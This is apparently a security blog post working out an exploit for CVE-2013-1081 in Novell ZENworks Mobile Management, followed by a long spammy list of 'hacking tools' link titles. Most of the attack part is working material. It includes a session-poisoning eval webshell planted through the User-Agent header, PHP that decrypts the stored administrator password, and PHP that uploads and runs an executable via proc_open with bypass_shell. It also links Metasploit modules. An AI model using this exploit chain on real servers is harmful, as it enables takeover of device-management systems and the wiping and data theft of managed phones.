Novell Zenworks MDM: Mobile Device Management For The Masses

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below.

Time to wake up - https://www.youtube.com/watch?v=vQObWW06VAM

For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:

Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]

I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.

The actual CVE details are as follows:

"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."

After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist:

POST /DUSAP.php HTTP/1.1
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=

Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:

<?php
session_start();

$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';

if ($Language !== ''  &&  $Language != $_SESSION["language"])
{
     //check for validity
     if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
     {
          $_SESSION["language"] = $Language;
     }
}

if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}

$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);

In English:

• Check if the "language" parameter is passed in on the request
• If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
• The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
• If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
• If the session variable "language" is set, include it into the page
• Authenticate

So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:

$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;

The "$error" value is server controlled, the "language" has to be a valid file on the system (cant stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:

egrep -R '\$_SESSION\[.*\] =' ./

This pulled up a ton of results, including the following:

 /desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];

 Taking a look at the "download.php" file the following was observed:

<?php
session_start();
if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);

$ext = substr(strrchr($filename, '.'), 1);

if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey']  > 0)
{

} else
{
     $_SESSION['$error'] = LOGIN_FAILED_TEXT;
     header('Location: index.php');
}

The first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)

This will create a session file named "sess_payload" that we can include, the file contains the following:

 user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";

 Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe,etc) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the fuction, so it can be assumed it is magic:

return mdm_DecryptData($result[0]['Password']); 

Ends up it is magic – so I sent the following PHP to be executed on the server -

$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);

 


Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….

This functionality has been wrapped up into a metasploit module that is available on github:

https://github.com/steponequit/CVE-2013-1081/blob/master/novell_mdm_creds.rb

Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:

$wdir=getcwd()."\..\..\php\\\\temp\\\\";
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));

This bit of PHP will read the HTTP post's body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to.

After we have uploaded the file we can then carry out another request to execute what has been uploaded:

$wdir=getcwd()."\..\..\php\\\\temp\\\\";
$cmd=$wdir."cmd.exe";
$output=array();
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
     $output=explode("\\n",+stream_get_contents($pipes[1]));
     fclose($pipes[1]);
     proc_close($handle);
}
foreach($output+as &$temp){echo+$temp."\\r\\n";};

The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)

This process was then rolled up into a metasploit module which is available here:

https://github.com/steponequit/CVE-2013-1081/blob/master/novell_mdm_lfi.rb

Update: Metasploit modules are now available as part of metasploit.

Related news

1. Hacker Tools 2020
2. Hacker Tools For Windows
3. Pentest Tools Apk
4. Hack Apps
5. Pentest Tools Android
6. Hack Website Online Tool
7. Pentest Tools For Mac
8. Pentest Tools Windows
9. Wifi Hacker Tools For Windows
10. Pentest Tools For Mac
11. Hacks And Tools
12. Install Pentest Tools Ubuntu
13. Pentest Tools Framework
14. Beginner Hacker Tools
15. Hacker Tools Free Download
16. Hacking Tools For Pc
17. Nsa Hack Tools
18. Pentest Tools Github
19. Hacking Tools Name
20. Hacking Tools Download
21. Hack App
22. Hacking Tools Hardware
23. Hacking Tools For Windows
24. Hacking Tools Software
25. Hack Tools
26. Bluetooth Hacking Tools Kali
27. Pentest Reporting Tools
28. Hacker Tool Kit
29. Ethical Hacker Tools
30. What Are Hacking Tools
31. Best Hacking Tools 2020
32. Nsa Hack Tools
33. Hacker Tools Apk
34. Hacking Tools Github
35. Hacking Tools Github
36. New Hacker Tools
37. Hacking Tools Download
38. Hacker Tools Mac
39. Hacking Tools Online
40. Hacker Tools 2020
41. Hacking Tools Name
42. Hacking Tools Github
43. Hack Website Online Tool
44. Nsa Hack Tools Download
45. How To Install Pentest Tools In Ubuntu
46. Tools For Hacker
47. Hack Tools For Pc
48. Best Hacking Tools 2019
49. Hacking Tools Free Download
50. Hack Tools Download
51. Game Hacking
52. Android Hack Tools Github
53. Hacker Security Tools
54. Hacking Tools 2019
55. Hack Tools Online
56. Pentest Tools Bluekeep
57. Blackhat Hacker Tools
58. Pentest Tools Bluekeep
59. Pentest Tools Url Fuzzer
60. Hacking Tools For Kali Linux
61. Hacker Tools For Pc
62. Pentest Tools Nmap
63. Wifi Hacker Tools For Windows
64. Hacking Tools 2019
65. Install Pentest Tools Ubuntu
66. Hacking App
67. Hacks And Tools
68. Computer Hacker
69. Pentest Tools Subdomain
70. Hacker
71. Best Hacking Tools 2020
72. Pentest Tools For Windows
73. Hack Tools
74. Pentest Tools For Android
75. Hacker Tools Apk
76. Ethical Hacker Tools
77. New Hacker Tools
78. Hacking Tools 2020
79. Hacking Tools Name
80. Hacker Tools Windows
81. Pentest Tools For Android
82. Hack Tools For Ubuntu
83. Pentest Tools Linux
84. Install Pentest Tools Ubuntu
85. Hacking Tools For Windows 7
86. Hacker Tools Apk Download
87. How To Install Pentest Tools In Ubuntu
88. Pentest Tools Website Vulnerability
89. Hacker Tools For Ios
90. Pentest Tools Alternative
91. Pentest Tools For Android
92. Pentest Tools Kali Linux
93. Hacking Tools For Windows 7
94. Easy Hack Tools
95. Pentest Tools Windows
96. Hacker Tools Linux
97. Pentest Tools Tcp Port Scanner
98. Hack And Tools
99. Hacker
100. Android Hack Tools Github
101. Hack Tool Apk No Root
102. Pentest Tools Tcp Port Scanner
103. Hacker Tools Free
104. Hacker Tools For Pc
105. Pentest Tools Find Subdomains
106. Hacker Tools For Pc
107. Pentest Tools Github
108. Hacker Tools Apk
109. Hacking Tools Mac
110. Hacker Tools List
111. Hacker Tools Free
112. Hack Tools Download
113. Hack Tools 2019
114. Top Pentest Tools
115. Hack Tools Github
116. Hacking Tools Windows
117. Pentest Tools Url Fuzzer
118. Hacking Tools For Windows Free Download
119. Hacking Tools Download
120. Underground Hacker Sites
121. Hacker Tools Mac
122. Pentest Recon Tools
123. Ethical Hacker Tools
124. Hacking Tools
125. Hacking Tools Online
126. Pentest Tools Nmap
127. Hack Tools For Games
128. Hacker Tools Online
129. Pentest Tools Subdomain
130. Hacking Tools Free Download
131. Blackhat Hacker Tools
132. Computer Hacker
133. Hacker Tools Free Download
134. Pentest Tools Nmap
135. Hacking Tools For Windows
136. Pentest Tools For Windows
137. Hacker Tools List
138. Pentest Tools Tcp Port Scanner
139. Hack And Tools
140. Pentest Automation Tools
141. Underground Hacker Sites
142. Hacker Tools For Windows
143. How To Hack
144. Hack Tool Apk
145. Hacker Tools For Ios
146. Tools For Hacker
147. Hacker Tools
148. Hacking Tools Download
149. Hack Tool Apk
150. Pentest Recon Tools
151. Hak5 Tools
152. Hack Rom Tools
153. Hacker Tools Mac
154. World No 1 Hacker Software
155. Hacking Tools Online
156. Hack Tool Apk No Root
157. Hacker Tools Github
158. Hacking Tools For Games
159. Hacking Tools 2020
160. Top Pentest Tools
161. Hacking Tools For Windows 7
162. Tools Used For Hacking
163. Pentest Tools Bluekeep
164. Hacking Tools Name
165. Game Hacking
166. Hack And Tools
167. Hacking Tools Kit
168. Hack Rom Tools
169. Pentest Tools For Ubuntu
170. Hacks And Tools
171. Pentest Tools Nmap
172. Best Pentesting Tools 2018
173. Android Hack Tools Github
174. Hacking Tools 2019
175. Hack Tool Apk No Root
176. Usb Pentest Tools